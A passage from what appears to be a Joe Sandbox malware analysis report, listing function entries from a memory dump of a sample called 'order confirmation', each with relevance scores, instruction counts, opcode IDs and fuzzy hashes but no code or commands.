                                                    • Instruction Fuzzy Hash: 01F024713043419BF754A7199C01B22329AE7D065CFB5902AEB058FBC1F970EC01C3A4
                                                    Function 013E656A Relevance: .0, Instructions: 39COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c3eeae725b1dc7524cbab7bb81dae14bfb5b20985d21849e47bdbcfac2f6493e
                                                    • Instruction ID: b7bcf68dfa066a757853b8742706dd6ce0cb131395e0714b943dbc331a26da35
                                                    • Opcode Fuzzy Hash: c3eeae725b1dc7524cbab7bb81dae14bfb5b20985d21849e47bdbcfac2f6493e
                                                    • Instruction Fuzzy Hash: 1B01A9B0304795DFE322972CCD4DB663BD8FB54B48F894155FA018BAE6D778D8418610
                                                    Function 0145437C Relevance: .0, Instructions: 37COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                    • Instruction ID: 6393dca41cc5717d3b384ec9b1f10d47e78d74e465e1d21dd78f873402a1c3ce
                                                    • Opcode Fuzzy Hash: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                    • Instruction Fuzzy Hash: 9EF0E931341A1347EBB6AB2E9410B2BA6959F90D40B0D053E9D05CF7B7EF30DC918780
                                                    Function 0143E872 Relevance: .0, Instructions: 36COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                                    • Instruction ID: 6f954f315f23baba421efd4f886878bf357d50e9a89abee631b0eda9a1766bec
                                                    • Opcode Fuzzy Hash: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                                    • Instruction Fuzzy Hash: 00F05432B125129BD7259A4ECC80F57B768AFD9A60F19006AAA04AB370C770EC0287D0
                                                    Function 0143C89D Relevance: .0, Instructions: 36COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 777dcd37a991972ffb11921846b747f8f7437c78e8432007ee2a5768658a6d95
                                                    • Instruction ID: cd135e384102f04ef21a1557ebdbc7029ecb70a35cd1287880fecd35cfda27b6
                                                    • Opcode Fuzzy Hash: 777dcd37a991972ffb11921846b747f8f7437c78e8432007ee2a5768658a6d95
                                                    • Instruction Fuzzy Hash: E0F0AF716093049FC314EF28C445A1BBBE4FF98714F40465FB998DB390E634EA01C796
                                                    Function 013E0854 Relevance: .0, Instructions: 35COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                                    • Instruction ID: 9a0c77a2cfa278fe58d125790911db765828aa51490b59a85a935d9d9204164a
                                                    • Opcode Fuzzy Hash: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                                    • Instruction Fuzzy Hash: DCF0B472710205AFE718DB25CC05F96BAF9EF98748F148478A549E71A0FAB0ED01C754
                                                    Function 0143C912 Relevance: .0, Instructions: 34COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 52e381e5747283bc30b5e0585ebb23d35731c5f92b6c19984898bdf56574b340
                                                    • Instruction ID: 0cef4d82f397f9d58f1189bd37c418efc6e7ac5c3e07e11f373614f32851d2fc
                                                    • Opcode Fuzzy Hash: 52e381e5747283bc30b5e0585ebb23d35731c5f92b6c19984898bdf56574b340
                                                    • Instruction Fuzzy Hash: 59F06270A01249EFCB04EF69C555AAEBBB4FF58304F01806AB955EB395DA34EE01CB54
                                                    Function 013B47FB Relevance: .0, Instructions: 33COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 01f3c9e177105110e27ae48ae0c07be0cb5cb8e98c9fd7f40a8a622a65e20673
                                                    • Instruction ID: a68a24b836731d81630cc197562fb109cb09910ae62afeff7b6947a47db35af6
                                                    • Opcode Fuzzy Hash: 01f3c9e177105110e27ae48ae0c07be0cb5cb8e98c9fd7f40a8a622a65e20673
                                                    • Instruction Fuzzy Hash: 20F0F6319012D59ED722971CC084BA17FE4DB0062CF08486AE74FC7D03F325D940C689
                                                    Function 01470115 Relevance: .0, Instructions: 32COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e61892505c85066fd458535fe71f3db05c60aabd1a82a7395c13fb7f4f7f75af
                                                    • Instruction ID: 03782e0ecd1dc77e1ac28afad6896ad7a22d60cc120fa1dda90bf5dbb9559729
                                                    • Opcode Fuzzy Hash: e61892505c85066fd458535fe71f3db05c60aabd1a82a7395c13fb7f4f7f75af
                                                    • Instruction Fuzzy Hash: 73F0A76A4176850ACB326B3C74602D26F5CE762114F5F244BE4A157339C6759883C365
                                                    Function 013EC5ED Relevance: .0, Instructions: 31COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d85934003ede1059b1b21168d7b1a2326998f994a22bebd915d3bfd348677107
                                                    • Instruction ID: 169bf3ca00dc4ea5925757219d44aeaa86e234c296281eb64f9f5058d3cc188d
                                                    • Opcode Fuzzy Hash: d85934003ede1059b1b21168d7b1a2326998f994a22bebd915d3bfd348677107
                                                    • Instruction Fuzzy Hash: 7FF0E2715117719FE722971CC14CB2B7BE89B817BCF0CB426D44A875D2C264F880CE50
                                                    Function 013F2619 Relevance: .0, Instructions: 31COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                    • Instruction ID: 636e81f48a015878a1030414474470e5fd172a657c54ce589e66e32434d5a141
                                                    • Opcode Fuzzy Hash: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                    • Instruction Fuzzy Hash: 54E0D8323006016BE7119E5D8CC0F477B6EDFD6B28F04007DB6045F251C9E2DC0987A4
                                                    Function 01446030 Relevance: .0, Instructions: 29COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                                    • Instruction ID: d5b340264fb88544fb9868809f9ee43145c6a0c45ddc57922b1aec52796f902c
                                                    • Opcode Fuzzy Hash: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                                    • Instruction Fuzzy Hash: B5F030B22042049FF321CF19D944F52B7F8EB06765F46C02AE6099B661D379EC40CFA4
                                                    Function 013B0710 Relevance: .0, Instructions: 28COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                    • Instruction ID: a7e0e3e2b50ab66882968e693147531a6bb147a87875534873023d435b686b1a
                                                    • Opcode Fuzzy Hash: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                    • Instruction Fuzzy Hash: 33F0E5392087459BDB1ACF2AC090AD6BBF8FB51354F000499F9468B751E732EE82CB50
                                                    Function 013E49D0 Relevance: .0, Instructions: 28COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                                    • Instruction ID: 3d7ae5348641096d0236f3484e763984e5b1920cb04520a30737d9b73f83a7b0
                                                    • Opcode Fuzzy Hash: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                                    • Instruction Fuzzy Hash: 39E0D832344359ABE3211A5D8808B6677EADBD87F4F150429E204CB5D0DB70DC40C7D8
                                                    Function 0145678E Relevance: .0, Instructions: 27COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                                    • Instruction ID: 4cbf7307f84292e35d8d3b76f06497504b47a055aba49e5e98071ab8e087e88a
                                                    • Opcode Fuzzy Hash: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                                    • Instruction Fuzzy Hash: E2E0DF32A00220FBEB2197998D05F9BBEACDB94EA4F060155FA00E71E0E530EE00C690
                                                    Function 013B25E0 Relevance: .0, Instructions: 23COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 28ad104e2467c1ac3c9fe56e56b3a75ce598539cf0216739e9b15fef42dbc502
                                                    • Instruction ID: 95782c724809c4579b8608fc96056f2b7c6b2055db94052b51d2530b983d4b10
                                                    • Opcode Fuzzy Hash: 28ad104e2467c1ac3c9fe56e56b3a75ce598539cf0216739e9b15fef42dbc502
                                                    • Instruction Fuzzy Hash: 87E092321006549BC721BB2DDD41FCB7B9AEB60768F014619B216575A0CA34BC10C788
                                                    Function 0146A456 Relevance: .0, Instructions: 23COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 1c3962ef014767a9d047a1ce435ecdb8fc5cd5a05dfca32f291fec24eb47eca0
                                                    • Instruction ID: 593c867d94c0681e05fbd9c3209fcfdec6d8b5746729eee13b082f38eb31cea1
                                                    • Opcode Fuzzy Hash: 1c3962ef014767a9d047a1ce435ecdb8fc5cd5a05dfca32f291fec24eb47eca0
                                                    • Instruction Fuzzy Hash: 6AE06D31010A22DBEB326B2EDC08B577AE4AF50719F24882DA196125B0C775D880CA41
                                                    Function 01434000 Relevance: .0, Instructions: 22COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                    • Instruction ID: 2fb42a6b0bad78e1a0a67301157314bdcc1a88640e5c2275868dd8664dd61c3d
                                                    • Opcode Fuzzy Hash: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                    • Instruction Fuzzy Hash: F4E0AE783002058BE715CF19C040BA6BBB6BFD9A10F28C069A9488F305EB32A8428A40
                                                    Function 013ECA38 Relevance: .0, Instructions: 22COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b5004a49645743b0d8060f680591262c0c92ab911549b725626f994c425b9c14
                                                    • Instruction ID: 7a75fb1e3ebc0155d5adf30952282a1fd178b28468f9ae72a2f97712cff8d88d
                                                    • Opcode Fuzzy Hash: b5004a49645743b0d8060f680591262c0c92ab911549b725626f994c425b9c14
                                                    • Instruction Fuzzy Hash: 35D02B335822306ADF35E22CBC08FDB3AED9B40668F025860F10892061D514CC8187C4
                                                    Function 013A823B Relevance: .0, Instructions: 21COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                    • Instruction ID: 4a30b52426f787834521b9b49024a63e14529cdeb9a2df423d89aadd7b31225d
                                                    • Opcode Fuzzy Hash: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                    • Instruction Fuzzy Hash: 19E0C231040A18EFDB322F1ADC00F627AA5FF64B19F1088AEE581164A48775AC81CB48
                                                    Function 013B2050 Relevance: .0, Instructions: 20COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e920b33842b3b1b58b5c4b29eec32200999ff3ac35fb018e5c8f9939a067b04a
                                                    • Instruction ID: 1837fa0251535bd3c913ff51660c3fd688b863b8db9b09e985faeea903b8192c
                                                    • Opcode Fuzzy Hash: e920b33842b3b1b58b5c4b29eec32200999ff3ac35fb018e5c8f9939a067b04a
                                                    • Instruction Fuzzy Hash: 1AE0C2321005506BC711FB5DDD40F8A779EEFA4674F054225F255876E0DA64BC00C798
                                                    Function 013E8A90 Relevance: .0, Instructions: 20COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
                                                    • Instruction ID: c9a85b96b217667419db5f578f82a9ad904ad9898dd6fa7d89e790ed65960c71
                                                    • Opcode Fuzzy Hash: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
                                                    • Instruction Fuzzy Hash: 57E08633521B1887D728DE1CD515B7277E8EF45720F09463EA613477D0C534E544C794
                                                    Function 01406AA4 Relevance: .0, Instructions: 17COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 2a1cd49be4a36f16e465d6e8719326e712c3afc978f3fe3bf45b66f7a6b88852
                                                    • Instruction ID: 4cc16e70ff1eeea1f5df63ca3b0a8dc835c39f2e05f17e4a51169b627b6873c6
                                                    • Opcode Fuzzy Hash: 2a1cd49be4a36f16e465d6e8719326e712c3afc978f3fe3bf45b66f7a6b88852
                                                    • Instruction Fuzzy Hash: CAD05E36511A50AFC7329F1BEA00C53BBF9FBC5F20706063FA54683A20C670AC46CBA0
                                                    Function 013EE59C Relevance: .0, Instructions: 16COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                    • Instruction ID: e7e52e1b379b1f0a91e681c74e5b3b474ac0d3b178459751523f96599d0d5bb1
                                                    • Opcode Fuzzy Hash: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                    • Instruction Fuzzy Hash: 09D0A932204620ABDB32AA1CFC00FC333E8BB88B24F06485AF008C7160C360AC81CA84
                                                    Function 0142E908 Relevance: .0, Instructions: 16COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                                    • Instruction ID: d795c3650ff1f7acddd9ce6a017da67366bc17a5ae5c19c1699a88c707249d24
                                                    • Opcode Fuzzy Hash: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                                    • Instruction Fuzzy Hash: EFE0EC35A506849FDF12DF5DC640F9EBBB5BB94B40F554059E5086B671C634AD40CB40
                                                    Function 013AA0E3 Relevance: .0, Instructions: 15COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                    • Instruction ID: eeada259240b784fde6f7d6fb13c9212a6b3f428319cb02013a146dcb611cf59
                                                    • Opcode Fuzzy Hash: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                    • Instruction Fuzzy Hash: 93D01233216071A7DF29965A6914FAB7919EB81A98F5A006D750A93900C5158C42D7E0
                                                    Function 013EA830 Relevance: .0, Instructions: 14COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                                    • Instruction ID: b8a82a9b9693b243c60367af573fac555a5e4454521975dce698ecf04dae1b6d
                                                    • Opcode Fuzzy Hash: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                                    • Instruction Fuzzy Hash: 51D012371D054DBBCB119F66DC01F957BA9E764BA0F448020B504875A0C63AE950D684
                                                    Function 013ECA24 Relevance: .0, Instructions: 14COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d78e015b3aa7f8b0891622f9ff13f9a1e2819b173b6ec58c430f70d9556095dd
                                                    • Instruction ID: 3de0cafb3301d2c4a8b39a4a0f9fb7978e6e51ca59940dca1a741c1e56e614ac
                                                    • Opcode Fuzzy Hash: d78e015b3aa7f8b0891622f9ff13f9a1e2819b173b6ec58c430f70d9556095dd
                                                    • Instruction Fuzzy Hash: A8D052306012228BEF2AEB0CCA18A6E3AF4EB10A44B80007CEA0192970E328EC01CA00
                                                    Function 013C02A0 Relevance: .0, Instructions: 13COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                    • Instruction ID: 78c6488fbad90ceeced9a964c0609815d71b53cf859088330c8e4d5b70199d9c
                                                    • Opcode Fuzzy Hash: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                    • Instruction Fuzzy Hash: 44D09239216A80CFD61A8B0CC5A4B1533A4BB44F48F850494E402CBB22E628D940CA00
                                                    Function 013EC700 Relevance: .0, Instructions: 12COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                    • Instruction ID: 7da573d767e60c628cd09a79cb5395cb1f97387eaff8997364aaec94111ec4cb
                                                    • Opcode Fuzzy Hash: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                    • Instruction Fuzzy Hash: 12C01232290648AFCB12AA99CD01F467BA9EBA8B40F008021F2048B670C631EC20EA84
                                                    Function 013D0310 Relevance: .0, Instructions: 11COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                    • Instruction ID: 6d20ff4b66340af3b182f13df9c560f7245d070a51125b8c88c31ef2c01e25d0
                                                    • Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                    • Instruction Fuzzy Hash: 04D01237100248EFCB05DF55D890D9A772AFBD8B10F148019FD19076108A31ED62DA50
                                                    Function 013B0750 Relevance: .0, Instructions: 9COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                    • Instruction ID: 6b701d2673a6cc229cbe760521d56c3d5d0f8041dec1d1b13db1a172136cf8d5
                                                    • Opcode Fuzzy Hash: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                    • Instruction Fuzzy Hash: B2C04879705A428FCF16DB2ED298F8A77E4FB44B44F1548A4E805DBB22E635FC11CA10
                                                    Function 013F4340 Relevance: .0, Instructions: 4COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 315b56235793a4ff83693dd552e47942ded2f97b60770189c501ba2b76daffa8
                                                    • Instruction ID: 8469c1706fcb50e79350726d4c7b0ccf0aa039624c279d16d40117a3b06a1b88
                                                    • Opcode Fuzzy Hash: 315b56235793a4ff83693dd552e47942ded2f97b60770189c501ba2b76daffa8
                                                    • Instruction Fuzzy Hash: A7900231A15C01529141715949845464005A7F0301B55C022E0424599CCB348A965761
                                                    Function 013F4650 Relevance: .0, Instructions: 4COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
